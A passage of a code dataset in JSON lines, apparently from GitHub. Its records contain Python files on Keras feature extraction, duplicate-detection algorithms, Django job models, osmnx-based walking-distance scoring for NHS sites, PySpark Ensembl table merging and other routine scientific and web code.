input_shape=input_shape))\nmodel.add(Conv2D(128, (5, 5), activation='relu', padding='same'))\nmodel.add(Dropout(0.3))\nmodel.add(Conv2D(128, (5, 5), activation='relu', padding='same'))\nmodel.add(Dropout(0.3))\nmodel.add(Conv2D(128, (5, 5), activation='relu', padding='same'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.3))\nmodel.add(Conv2D(128, (5, 5), activation='relu', padding='same'))\nmodel.add(Dropout(0.3))\nmodel.add(Conv2D(128, (5, 5), activation='relu', padding='same'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.3))\nmodel.add(Conv2D(256, (3, 3), activation='relu', padding='same'))\nmodel.add(Dropout(0.3))\nmodel.add(Conv2D(256, (3, 3), activation='relu', padding='same'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.3))\nmodel.add(Conv2D(256, (3, 3), activation='relu', padding='same'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.3))\nmodel.add(Conv2D(512, (3, 3), activation='relu', padding='same'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.3))\nmodel.add(Flatten())\ndense_lyr_out = Dense(1024, activation='relu')\nmodel.add(dense_lyr_out)\nmodel.add(Dropout(0.5))\nmodel.add(Dense(num_classes, activation='softmax'))\n\nmodel.compile(loss=keras.losses.categorical_crossentropy,\n              optimizer=keras.optimizers.Adadelta(),\n              metrics=['accuracy'])\n\nmodel.load_weights('cnn_weights.hdf5')\n\ndense_lyr_out_f = K.function([model.layers[0].input, K.learning_phase()], [dense_lyr_out.output,])\n\nfor data_point in range(len(train_data)):\n    cur_out = dense_lyr_out_f([[train_data[data_point],], 0])[0]\n    total_features.append(cur_out.tolist())\n    cur_out = np.expand_dims(np.asarray(cur_out), axis=2)\n    out_name = file_names[data_point] + 'features.t7'\n    tensor_t = torch.fromNumpyArray(cur_out)\n    #torch.save(out_name, tensor_t)\n\npickle.dump(total_features, open(\"char-CNN-RNN-embeddings.pickle\", \"wb\"))\npickle.dump(class_ids, open(\"class_info.pickle\", \"wb\"))\npickle.dump(file_names, open(\"filenames.pickle\", \"wb\"))","repo_name":"erilyth/DeepLearning-Challenges","sub_path":"Image_Synthesis_From_Text/char-CNN-RNN/pascal1k/featurescnn.py","file_name":"featurescnn.py","file_ext":"py","file_size_in_byte":3739,"program_lang":"python","lang":"en","doc_type":"code","stars":265,"dataset":"github-code","pt":"48"} +{"seq_id":"28507391829","text":"sum_s = 1000\r\nsum_e = 1100\r\nper = 0\r\n\r\nmont = 0\r\nwhile sum_s < sum_e:\r\n    per = float(input('enter the desired percentage (from 0 to 25):'))\r\n    if 0 < per < 25:\r\n        sum_s += sum_s/100*per\r\n        mont += 1\r\n    else:\r\n        print('you entered an invalid percentage, try again')\r\n\r\nprint('after {} months the amount will be {}'.format(mont, sum_s))","repo_name":"dekamiron/my_first_attempt","sub_path":"homeWork02/task04.py","file_name":"task04.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37758966259","text":"from ast import List\n\n\n#Given an integer array nums, return true if any value appears at least twice in the array, and return false if every element is distinct.\n\n# Example 1:\n# Input: nums = [1,2,3,1]\n# Output: true\n\n# Example 2:\n# Input: nums = [1,2,3,4]\n# Output: false\n\n# Example 3:\n# Input: nums = [1,1,1,3,3,4,3,2,4,2]\n# Output: true\n\n\n\"\"\"\n1\nBrute Force Approach \nt: O(N ^ 2) s: O(1)\n\"\"\"\ndef find_duplicates_bruteforce(nums):\n    for i in range(len(nums)):\n        for j in range(i+1, len(nums)):\n            if nums[i] == 
nums[j]:\n return True \n \n return False \n\n\"\"\"\n2\nSorting \nt: O(NlogN) s: O(1)\n\"\"\"\ndef duplicate_sorting(nums):\n nums.sort()\n \n for i in range(1, len(nums)):\n if nums[i] == nums[i-1]:\n return True \n \n return False \n\"\"\"\n3\n# Hashmap / Hashset \nt: O(N) and s: O(N)\n\"\"\"\ndef duplicate_4(nums):\n\n seen = set()\n for num in nums:\n if num in seen:\n return True\n seen.add(num)\n \n return False \n\n\"\"\"\n4\nSet and Original Comparison\nt: O(N) and s: O(N)\n\"\"\"\n\ndef duplicate_5(nums):\n nums_set = set(nums)\n return len(nums) == len(nums_set)\n\n\"\"\"\n5\nUsing collections.counter()\nt: O(N) s:(N)\n\"\"\"\nimport collections \ndef duplicate_6(nums):\n count_dict = collections.Counter(nums).items()\n print([item for item, count in count_dict if count > 1])\n\n\n\n\n\nif __name__ == \"__main__\":\n nums = [4,6,1,8,10,4]\n k = 3\n print(duplicate_4(nums))\n\n","repo_name":"ermantatar/Algorithms","sub_path":"Python/0_______ARRAY_______/Contains_Duplicate.py","file_name":"Contains_Duplicate.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25599308156","text":"from django.db import models\nfrom users.models import User\nfrom company.models import Company\n\n #for filtering job search\nclass City(models.Model):\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return self.name\n \nclass Industry(models.Model):\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return self.name\n \n# Create your models here.\nclass Job(models.Model):\n job_type_choices = (\n ('Full Time', 'Full Time'),\n ('Part Time', 'Part Time'),\n ('Internship', 'Internship'),\n ('Remote', 'Remote'),\n \n )\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n company = models.ForeignKey(Company, on_delete=models.CASCADE)\n title = models.CharField(max_length=100)\n # email = models.EmailField(unique=True)\n # location = models.CharField(max_length=100)\n salary = models.IntegerField(default=35000)\n requirements = models.TextField()\n ideal_candidate = models.TextField()\n is_available = models.BooleanField(default=True)\n timestamp = models.DateTimeField(auto_now_add=True)\n industry = models.ForeignKey(Industry, on_delete=models.DO_NOTHING, null=True, blank=True)\n city = models.ForeignKey(City, on_delete=models.DO_NOTHING, null=True, blank=True)\n job_type = models.CharField(max_length=100, choices=job_type_choices, null=True, blank=True)\n\n def __str__(self):\n return self.title\n \nclass ApplyJob(models.Model):\n JOB_STATUS_CHOICES = (\n ('Pending', 'Pending'),\n ('Approved', 'Approved'),\n ('Rejected', 'Rejected'),\n )\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n job = models.ForeignKey(Job, on_delete=models.CASCADE)\n content = models.CharField(max_length=20000, null=True, blank=True, )\n experience = models.PositiveBigIntegerField(null=True, blank=True)\n\n timestamp = models.DateTimeField(auto_now_add=True)\n job_status = models.CharField(max_length=20, choices=JOB_STATUS_CHOICES, default='Pending')\n\n\n\nclass ConversationMessage(models.Model):\n applyjob = models.ForeignKey(ApplyJob, related_name='conversationmessages', on_delete=models.CASCADE)\n content = models.TextField(null=True, blank=True)\n user = models.ForeignKey(User, related_name='conversationmessages', on_delete=models.CASCADE)\n timestamp = models.DateTimeField(auto_now_add=True)\n\n\n class Meta:\n ordering = 
['timestamp']\n","repo_name":"Noahwekesa/Job-django","sub_path":"src/job/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28261762550","text":"from pyspark.sql.functions import *\nfrom pyspark.sql.functions import col\n\nfrom utils import spark, users_df\n\ndf = users_df.select(\n col('id'),\n users_df['customer_from'],\n date_format(col('customer_from'), 'yyyyMMdd').alias('int_date'),\n)\ndf.show()\n\ncols = [\n col('id'),\n users_df['customer_from'],\n date_format(col('customer_from'), 'yyyyMMdd').cast('int').alias('int_date')\n]\n\ndf.select(cols).show()\n\ndf.select(cols).printSchema()\n\ndf.select(*cols).show()\n\ndf.select(*cols).printSchema()\n\ncustomer_from_alias = date_format(col('customer_from'), 'yyyyMMdd').cast('int').alias('int_date')\n\ndf.select('id', customer_from_alias).show()","repo_name":"gsk-21/SPARK","sub_path":"Databricks/Databricks Certified Associate Developer/Udemy/selecting and renaming cols/3.col_functions.py","file_name":"3.col_functions.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"11796272489","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nimport networkx as nx\nimport osmnx as ox\nimport geopandas as gpd\nimport networkx as nx\nfrom cartopy.geodesic import Geodesic\nfrom shapely.geometry.polygon import Point, Polygon\nfrom shapely.geometry import shape\nfrom shapely.ops import unary_union\nimport nhstravel.loaders.lsoaloader as lsoaloader\nimport folium\nimport streamlit as st\n\n\n# use the postcode lookup csv to get the lsoa regions for each target location to pass to the lsoa loaders function\ndef get_lsoas_from_postcode(list_of_target_addresses):\n postcode_lookup = pd.read_csv(\n \"data/PCD_OA21_LSOA21_MSOA21_LAD_NOV22_UK_LU 3.csv\", encoding=\"ISO-8859-1\"\n )\n # get the lsoa 2021 code from the lookup file\n lsoa_names = []\n # lsoa_codes = []\n for postcode in list_of_target_addresses:\n # lsoa_codes.append(postcode_lookup.loc[postcode_lookup['pcds'] == postcode]['lsoa21cd'].values[0])\n lsoa_names.append(\n postcode_lookup.loc[postcode_lookup[\"pcds\"] == postcode][\"ladnm\"].values[0]\n )\n return lsoa_names\n\n\n# function to call lsoa loaders library to import lsoa data for the given regin\ndef load_lsoa(region):\n print(\"building lsoa for \", region)\n remapped_lsoas_dict = {}\n lsoa_with_population_pd = lsoaloader.build_lsoa_data_frame_for_area_england(region)\n remapped_lsoa = lsoaloader.load_geo_json_shapefiles_for_lsoas(\n lsoa_with_population_pd, region\n )\n remapped_lsoas_dict[region] = remapped_lsoa\n return remapped_lsoa, remapped_lsoas_dict\n\n\n# for each lsoa region use the lsoa loaders function to load in the data from that region\n# create a dictionary of polygons containing all neighbouring polygons within the user specified radius\ndef generate_neighboring_polys(list_of_target_addresses, lsoa_names, radius):\n neighboring_polys_dict = {}\n for address, lsoa_region in zip(list_of_target_addresses, lsoa_names):\n # load in lsoa data using the loaders function in nhs travel\n remapped_lsoa, remapped_lsoas_dict = load_lsoa(lsoa_region)\n\n # convert the postcode to lat long coordinates\n target_coords = ox.geocode(address)\n\n # create the bounding poly from target location of size = radius specified\n gd = Geodesic()\n 
bounding_poly = Polygon(\n            gd.circle(lon=target_coords[1], lat=target_coords[0], radius=radius)\n        )\n\n        # convert coordinates to a point object to check if this point is contained within the bounding poly\n        target_point = Point(target_coords[1], target_coords[0])\n\n        # store the features from remapped_lsoa (lsoa_loaders module)\n        neighboring_polys = {\"lsoa_codes\": [], \"population\": [], \"polygons\": []}\n        for lsoa in remapped_lsoa[\"features\"]:\n            lsoa_polygon = shape(lsoa[\"geometry\"])\n            if lsoa_polygon.contains(target_point) or bounding_poly.intersects(\n                lsoa_polygon\n            ):\n                neighboring_polys[\"lsoa_codes\"].append(lsoa[\"properties\"][\"LSOA21CD\"])\n                neighboring_polys[\"population\"].append(lsoa[\"properties\"][\"all ages\"])\n                neighboring_polys[\"polygons\"].append(lsoa_polygon)\n\n        neighboring_polys_dict[address] = neighboring_polys\n    return neighboring_polys_dict, remapped_lsoas_dict\n\n\n# create networkx map from the neighbouring polygons we created using the function above\n# without allow_output_mutation, st.cache performs a hash of the entire graph on every run, which takes a long time; skip the check\n@st.cache(persist=True, allow_output_mutation=True)\ndef generate_networkx(list_of_target_addresses, neighboring_polys_dict, type):\n    # initialise the main dict to contain each networkx map and its nodes\n    networkx_dict = {}\n\n    for address in list_of_target_addresses:\n        # initialise the data types for each address in the dictionary\n        networkx_dict[address] = {}\n\n        # create merged polygon to generate map from this area\n        merged_poly = unary_union(neighboring_polys_dict[address][\"polygons\"])\n\n        # generate networkx map and nodes and store in dictionary under the sub key for address\n        G = ox.graph_from_polygon(merged_poly)\n        networkx_dict[address][\"map\"] = G\n        nodes, edges = ox.graph_to_gdfs(G)\n        networkx_dict[address][\"nodes\"] = nodes\n\n    return networkx_dict\n\n\n# function to generate the sample of nodes from each collection of lsoas for each target location\ndef generate_nodes_samples(\n    list_of_target_addresses, neighboring_polys_dict, networkx_dict\n):\n    dict_of_nodes_samples = {}\n    for address in list_of_target_addresses:\n        nodes = networkx_dict[address][\"nodes\"]\n        nodes_sample = pd.DataFrame(columns=nodes.columns)\n        neighboring_polys = neighboring_polys_dict[address]\n\n        target_coords = ox.geocode(address)\n        target_node = ox.get_nearest_node(networkx_dict[address][\"map\"], target_coords)\n\n        list_of_lsoa_codes = []\n        list_of_pops = []\n\n        for i in range(len(neighboring_polys[\"polygons\"])):\n            lsoa = neighboring_polys[\"polygons\"][i]\n            for j in range(nodes.shape[0]):\n                if lsoa.contains(nodes.iloc[j][\"geometry\"]):\n                    nodes_sample = nodes_sample.append(nodes.iloc[j])\n                    list_of_lsoa_codes.append(neighboring_polys[\"lsoa_codes\"][i])\n                    list_of_pops.append(neighboring_polys[\"population\"][i])\n\n        nodes_sample[\"lsoa_codes\"] = list_of_lsoa_codes\n        nodes_sample[\"lsoa_population\"] = list_of_pops\n\n        nodes_sample = nodes_sample.drop(target_node)\n\n        dict_of_nodes_samples[address] = nodes_sample\n    return dict_of_nodes_samples\n\n\n# a function to calculate a score from a list of lengths calculated from the target node to each of the 100 sample nodes\ndef create_score(list_of_lengths, list_of_pop_fracs, list_of_node_pops):\n    average_walk = 0\n    for l, m in zip(list_of_lengths, list_of_pop_fracs):\n        distance_km = l / 1000\n        time_hours = distance_km / 4.5\n        time_minutes = time_hours * 60\n        time_increment = (\n            time_minutes * m\n        )  # convert the length to km, divide by the walking speed of 4.5 km/h, and multiply by 60 to get the time in minutes, weighted by the population fraction\n        average_walk = (\n            average_walk + time_increment\n        )  # accumulate the population-weighted walk time over the sample nodes\n\n    total_pop = sum(list_of_node_pops)\n    return average_walk, total_pop\n\n\n# define a function to calculate multiple shortest route lengths from the target node to each of the 100 sample nodes\ndef create_list_of_lengths(G, nodes_sample, target_node):\n    list_of_lengths = []\n    list_of_pop_fracs = []\n    list_of_node_pops = []\n\n    for node in nodes_sample.index:\n        current_lsoa = nodes_sample[\"lsoa_codes\"][node]\n        nodes_in_lsoa = nodes_sample.loc[\n            nodes_sample[\"lsoa_codes\"] == current_lsoa\n        ].shape[0]\n        total_pop = nodes_sample[\"lsoa_population\"].unique().sum()\n        node_pop = nodes_sample[\"lsoa_population\"][node] / nodes_in_lsoa\n        list_of_node_pops.append(node_pop)\n        pop_fraction = node_pop / total_pop\n\n        try:\n            length = nx.shortest_path_length(\n                G, source=node, target=target_node, weight=\"length\"\n            )  # calculate the route length from the target node to the sample node\n        except Exception:\n            pass\n        list_of_lengths.append(length)  # append the length to the list\n        list_of_pop_fracs.append(\n            pop_fraction\n        )  # append the multipliers to the list for score creation\n\n    return [list_of_lengths, list_of_pop_fracs, list_of_node_pops]\n\n\n# function to generate the score for each of the potential target sites provided using create_score()\ndef generate_target_routes_and_scores(\n    networkx_dict, dict_of_nodes_samples, list_of_target_addresses, radius\n):\n    target_scores = {}\n    site_names = []\n    target_to_node_routes = {}\n    i = 1\n\n    for address in list_of_target_addresses:\n        # initialise all variables\n        list_of_routes = []\n        # retrieve node sample using address lookup\n        nodes_sample = dict_of_nodes_samples[address]\n        # create site name for each postcode\n        site_name = \"Site {}\".format(i)\n        # retrieve networkx map from dict using address lookup\n        G = networkx_dict[address][\"map\"]\n\n        # convert post code to lat long and use this to find the nearest node on the networkx map\n        target_coords = ox.geocode(address)\n        target_node = ox.get_nearest_node(G, target_coords)\n\n        # call our create_list_of_lengths and create_score functions defined above to generate the scores for each target site\n        target_lengths = create_list_of_lengths(G, nodes_sample, target_node)\n        target_scores[site_name] = create_score(\n            target_lengths[0], target_lengths[1], target_lengths[2]\n        )\n        print(\n            \"{} at {} has an average walk time of: %.2f minutes in a radius of {} metres\".format(\n                site_name, address, radius\n            )\n            % target_scores[site_name][0]\n        )\n        print(\n            \"{} at {} has an average population score of: %.2f in a radius of {} metres\".format(\n                site_name, address, radius\n            )\n            % target_scores[site_name][1]\n        )\n\n        for node in nodes_sample.index:\n            try:\n                route = nx.shortest_path(\n                    G, source=node, target=target_node, weight=\"length\"\n                )  # calculate the route from the target node to the sample node\n                list_of_routes.append(route)  # append the route to the list\n            except Exception:\n                pass\n        target_to_node_routes[site_name] = list_of_routes\n\n        site_names.append(site_name)\n        i += 1\n    return target_to_node_routes, target_scores, site_names\n\n\ndef generate_route_layers(\n    networkx_dict,\n    target_to_node_routes,\n    site_names,\n    list_of_target_addresses,\n    target_scores,\n    colors=[\"green\", \"red\", \"yellow\", \"blue\", \"pink\", \"purple\"],\n):\n    \"\"\"Function to plot routes from target nodes to sample nodes on a folium map\n\n    Args:\n        G: Networkx 
graph of area\n target_to_node_routes: Dict of site names to list of routes from that node to target\n site_names: list of sites\n list_of_target_addresses: list of target addresses (same length & order as site names)\n list_of_target_coords: list of target coords (same length & order as site names)\n target_scores: score for each target\n colors: (optional) colors for routes for each site\n\n Returns:\n Single folium map with all routes and markers with one layer per site\n \"\"\"\n result = []\n for i, (site, target_address) in enumerate(\n zip(site_names, list_of_target_addresses)\n ):\n G = networkx_dict[target_address][\"map\"]\n target_coords = ox.geocode(target_address)\n layer = routes_to_featuregroup(\n G, routes=target_to_node_routes[site], color=colors[i], name=site\n )\n iframe = folium.IFrame(\n '<font face = \"Arial\"><b>{}:</b> {}. <br><br><b>{} Score:</b> {}</br></br></font>'.format(\n site, target_address, site, target_scores[site]\n )\n )\n popup = folium.Popup(iframe, min_width=200, max_width=300)\n folium.Marker(\n location=target_coords,\n popup=popup,\n icon=folium.Icon(color=colors[i], icon=\"info-sign\"),\n ).add_to(layer)\n result.append(layer)\n return result\n\n\ndef routes_to_featuregroup(G, routes, color, name):\n \"\"\"\n Convert a networkx route into a folium FeatureGroup\n\n Args:\n G: Networkx graph of area\n routes: list of routes, each of which is a list of node indices\n color: color for lines in folium\n name: name for resulting feature group\n\n Returns:\n a feature group with all routes as lines\n \"\"\"\n layer = folium.FeatureGroup(name=name)\n lines = []\n for route in routes:\n route_coords = []\n for node in route:\n route_coords.append((G.nodes[node][\"y\"], G.nodes[node][\"x\"]))\n lines.append(route_coords)\n folium.PolyLine(lines, color=color, weight=2, opacity=0.5).add_to(layer)\n\n return layer\n\n\ndef generate_lsoa_layer(remapped_lsoa, color=\"blue\"):\n layer = folium.FeatureGroup(name=\"LSOAs\")\n style = {\"color\": color}\n\n shape = folium.GeoJson(data=remapped_lsoa, style_function=lambda x: style)\n shape.add_to(layer)\n return layer\n\n\n# function to plot each of the routes from the target node to the sample nodes as a folium map and add a marker for the target node\n# save each of the folium maps as a folium object in the list route_maps to be displayed by streamlit\ndef generate_route_maps(\n networkx_dict,\n target_to_node_routes,\n site_names,\n list_of_target_addresses,\n target_scores,\n):\n route_maps = []\n for site, address in zip(site_names, list_of_target_addresses):\n G = networkx_dict[address][\"map\"]\n\n target_coords = ox.geocode(address)\n target_node = ox.get_nearest_node(G, target_coords)\n\n route_map = ox.plot_route_folium(\n G, target_to_node_routes[site][0], route_color=\"#ff0000\", opacity=0.5\n )\n for route in target_to_node_routes[site][1 : len(target_to_node_routes[site])]:\n route_map = ox.plot_route_folium(\n G, route, route_map=route_map, route_color=\"#ff0000\", opacity=0.5\n )\n\n iframe = folium.IFrame(\n '<font face = \"Arial\"><b>{}:</b> {}. 
<br><br><b>{} Score:</b> {}</br></br></font>'.format(\n                site, address, site, target_scores[site]\n            )\n        )\n        popup = folium.Popup(iframe, min_width=200, max_width=300)\n        folium.Marker(location=target_coords, popup=popup).add_to(route_map)\n        route_maps.append(route_map)\n    return route_maps\n\n\n# save each of the folium maps as a folium object in the list route_maps to be displayed by streamlit\ndef save_maps(site_names, route_maps):\n    for site_name, map in zip(site_names, route_maps):\n        map.save(\"route map for {}.html\".format(site_name))\n\n\n# main function to generate the networkx map and then the scores and folium map for each proposed target location\ndef mclp_main(list_of_target_addresses, radius):\n    lsoa_names = get_lsoas_from_postcode(list_of_target_addresses)\n    neighboring_polys_dict, remapped_lsoas_dict = generate_neighboring_polys(\n        list_of_target_addresses, lsoa_names, radius\n    )\n    networkx_dict = generate_networkx(\n        list_of_target_addresses, neighboring_polys_dict, type\n    )\n    dict_of_nodes_samples = generate_nodes_samples(\n        list_of_target_addresses, neighboring_polys_dict, networkx_dict\n    )\n    (\n        target_to_node_routes,\n        target_scores,\n        site_names,\n    ) = generate_target_routes_and_scores(\n        networkx_dict, dict_of_nodes_samples, list_of_target_addresses, radius\n    )\n\n    first_target = ox.geocode(list_of_target_addresses[0])\n\n    map = folium.Map(location=first_target, tiles=\"cartodbpositron\", zoom_start=13)\n\n    generate_lsoa_layer(remapped_lsoas_dict[lsoa_names[0]], color=\"blue\").add_to(map)\n\n    layers = generate_route_layers(\n        networkx_dict,\n        target_to_node_routes,\n        site_names,\n        list_of_target_addresses,\n        target_scores,\n    )\n    for layer in layers:\n        layer.add_to(map)\n\n    # TO DO: keep in front doesn't work to move the lsoa's behind the route layers on the folium map\n\n    # add a layer control to toggle the layers on and off\n    folium.LayerControl().add_to(map)\n    # save_maps(site_names, route_map)\n    return target_scores, map\n\n\n# call the main function mclp_main(['postcode1', 'postcode2'], radius=500) to generate target_scores and route maps\n","repo_name":"DiiS-DataScience/MedMap2","sub_path":"streamlit/scripts/mclp_functions.py","file_name":"mclp_functions.py","file_ext":"py","file_size_in_byte":15922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6996925194","text":"\"\"\"\nUtils and wrappers for scoring taggers.\n\"\"\"\nfrom stanfordnlp.models.common.utils import ud_scores\n\ndef score(system_conllu_file, gold_conllu_file, verbose=True):\n    \"\"\" Wrapper for tagger scorer. \"\"\"\n    evaluation = ud_scores(gold_conllu_file, system_conllu_file)\n    el = evaluation['AllTags']\n    p = el.precision\n    r = el.recall\n    f = el.f1\n    if verbose:\n        scores = [evaluation[k].f1 * 100 for k in ['UPOS', 'XPOS', 'UFeats', 'AllTags']]\n        print(\"UPOS\\tXPOS\\tUFeats\\tAllTags\")\n        print(\"{:.2f}\\t{:.2f}\\t{:.2f}\\t{:.2f}\".format(*scores))\n    return p, r, f\n\n","repo_name":"stanfordnlp/stanfordnlp","sub_path":"stanfordnlp/models/pos/scorer.py","file_name":"scorer.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"48"} +{"seq_id":"17414778645","text":"from hwt.doc_markers import internal\nfrom hwt.hdl.constants import INTF_DIRECTION\nfrom hwt.synthesizer.unit import Unit\nfrom hwtSimApi.hdlSimulator import HdlSimulator\n\n\n@internal\ndef autoAddAgents(unit: Unit, sim: HdlSimulator):\n    \"\"\"\n    Walk all interfaces on unit and instantiate agent for every interface.\n\n    :return: all monitor/driver functions which should be added to simulation\n        as processes\n    \"\"\"\n    for intf in unit._interfaces:\n        assert intf._isExtern, intf\n\n        intf._initSimAgent(sim)\n        assert intf._ag is not None, intf\n\n\n@internal\ndef collect_processes_from_sim_agents(unit: Unit):\n    proc = []\n    for intf in unit._interfaces:\n        a = intf._ag\n        if not intf._isExtern or a is None:\n            continue\n\n        if intf._direction == INTF_DIRECTION.MASTER:\n            agProcs = a.getMonitors()\n        elif intf._direction == INTF_DIRECTION.SLAVE:\n            agProcs = a.getDrivers()\n        else:\n            raise NotImplementedError(f\"intf._direction {intf._direction} for {intf}\")\n\n        proc.extend(agProcs)\n\n    return proc\n\n","repo_name":"Nic30/hwt","sub_path":"hwt/simulator/agentConnector.py","file_name":"agentConnector.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":188,"dataset":"github-code","pt":"48"} +{"seq_id":"40371270927","text":"\"\"\"td5_mwe_odeint.py\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import odeint\n\n#############################\n# SOLVER PARAMETERS\n#############################\nt0 = 0             # bounds of the solving interval\ntf = 5             # in seconds\ndt = 1e-3          # time step in seconds\nn = int((tf-t0)/dt + 1)   # number of points\nt = np.linspace(t0,tf,n)  # time in seconds\nX0 = [1,0]         # initial conditions: [u(0), du(0)/dt]\nomega0 = 2 * np.pi * 1    # natural angular frequency in s^-1\n\n###############################################\n# FUNCTION ASSOCIATED WITH THE DIFFERENTIAL EQUATION\n###############################################\ndef F(V, t):\n    x, y = V                 # vector V: v[0] = u, v[1] = du/dt\n    dx = y                   # dx/dt\n    dy = -omega0 ** 2 * x    # dy/dt\n    dV = [dx, dy]            # vector dV/dt: dV[0] = du/dt, dV[1] = d2u/dt2 \n    return dV\n\n########################################\n# SOLVING AND PLOTTING\n########################################\nX = odeint(F, X0, t)   # solve the ODE\nu = X[:,0]             # extract the data\nplt.plot(t, u)\nplt.xlabel(\"Time (s)\")\nplt.ylabel(\"Voltage (V)\")","repo_name":"remimetzdorff/mp2i","sub_path":"python/td5_mwe_odeint.py","file_name":"td5_mwe_odeint.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"15544556210","text":"import os\n\nfrom pyspark.sql import SparkSession\n\nfrom labw_utils.commonutils.libfrontend import setup_basic_logger\nfrom labw_utils.commonutils.stdlib_helper.logger_helper import get_logger\n\n_lh = 
get_logger()\n\nPRIMIARY_KEY_RENAME_TABLE = {\n \"transcript_id\": \"ensdb_pk_transcript_id\",\n \"gene_id\": \"ensdb_pk_gene_id\",\n \"exon_id\": \"ensdb_pk_exon_id\",\n \"repeat_feature_id\": \"ensdb_pk_repeat_feature_id\"\n}\n\nsetup_basic_logger()\nspark = SparkSession.builder.getOrCreate()\n_lh.info(\"Using pyspark version %s\", spark.version)\ntranscript_table = spark.read.parquet(os.path.join(\"converted_parquet\", \"transcript.parquet\"))\nseq_region_synonym_table = spark.read.parquet(os.path.join(\"converted_parquet\", \"seq_region_synonym.parquet\"))\nexternal_db_table = spark.read.parquet(os.path.join(\"converted_parquet\", \"external_db.parquet\"))\ngene_table = spark.read.parquet(os.path.join(\"converted_parquet\", \"gene.parquet\"))\nexon_table = spark.read.parquet(os.path.join(\"converted_parquet\", \"exon.parquet\"))\nexon_transcript_table = spark.read.parquet(os.path.join(\"converted_parquet\", \"exon_transcript.parquet\"))\nrepeat_feature_table = spark.read.parquet(os.path.join(\"converted_parquet\", \"repeat_feature.parquet\"))\nrepeat_consensus_table = spark.read.parquet(os.path.join(\"converted_parquet\", \"repeat_consensus.parquet\"))\n\nseq_region_synonym_converter = (\n seq_region_synonym_table.\n select(\n \"seq_region_id\",\n \"external_db_id\",\n \"synonym\"\n ).\n join(\n external_db_table.\n select(\"external_db_id\", \"db_name\").\n filter(\"db_name = 'UCSC'\"),\n on=\"external_db_id\"\n ).\n select(\n \"seq_region_id\",\n \"synonym\"\n )\n)\n\n\ndef merge_gene():\n global ens_hgnc_gene_map_table\n _lh.info(\"Merging genes...\")\n final_locus = (\n gene_table.\n select(\n \"gene_id\",\n \"seq_region_id\",\n \"seq_region_start\",\n \"seq_region_end\",\n \"seq_region_strand\"\n ).\n join(\n seq_region_synonym_converter,\n on=\"seq_region_id\",\n how=\"inner\"\n ).\n drop(\"seq_region_id\").\n withColumnRenamed(\"synonym\", \"seqname\").\n withColumnRenamed(\"seq_region_start\", \"start\").\n withColumnRenamed(\"seq_region_end\", \"end\").\n withColumnRenamed(\"seq_region_strand\", \"strand\").\n withColumnsRenamed(PRIMIARY_KEY_RENAME_TABLE)\n )\n final_gene = (\n gene_table.\n select(\n \"gene_id\",\n \"stable_id\",\n \"version\",\n \"created_date\",\n \"modified_date\"\n ).\n withColumnRenamed(\"stable_id\", \"ensdb_gene_id\").\n withColumnRenamed(\"version\", \"ensdb_gene_version\").\n withColumnRenamed(\"created_date\", \"ensdb_gene_created_date\").\n withColumnRenamed(\"modified_date\", \"ensdb_gene_modified_date\").\n withColumnRenamed(\"gene_id\", \"ensdb_pk_gene_id\")\n )\n joint_table = final_gene.join(final_locus, on=\"ensdb_pk_gene_id\", how=\"inner\")\n joint_table.write.parquet(\n \"ensdb_genes.parquet.d\",\n mode=\"overwrite\"\n )\n return joint_table\n\n\ndef merge_transcripts():\n _lh.info(\"Merging transcripts...\")\n final_locus = (\n transcript_table.\n select(\n \"transcript_id\",\n \"seq_region_id\",\n \"seq_region_start\",\n \"seq_region_end\",\n \"seq_region_strand\"\n ).\n join(\n seq_region_synonym_converter,\n on=\"seq_region_id\",\n how=\"inner\"\n ).\n drop(\"seq_region_id\").\n withColumnRenamed(\"synonym\", \"seqname\").\n withColumnRenamed(\"seq_region_start\", \"start\").\n withColumnRenamed(\"seq_region_end\", \"end\").\n withColumnRenamed(\"seq_region_strand\", \"strand\").\n withColumnsRenamed(PRIMIARY_KEY_RENAME_TABLE)\n )\n final_misc = (\n transcript_table.\n select(\n \"transcript_id\",\n \"gene_id\",\n \"source\",\n \"description\",\n \"stable_id\",\n \"version\",\n \"created_date\",\n \"modified_date\"\n ).\n 
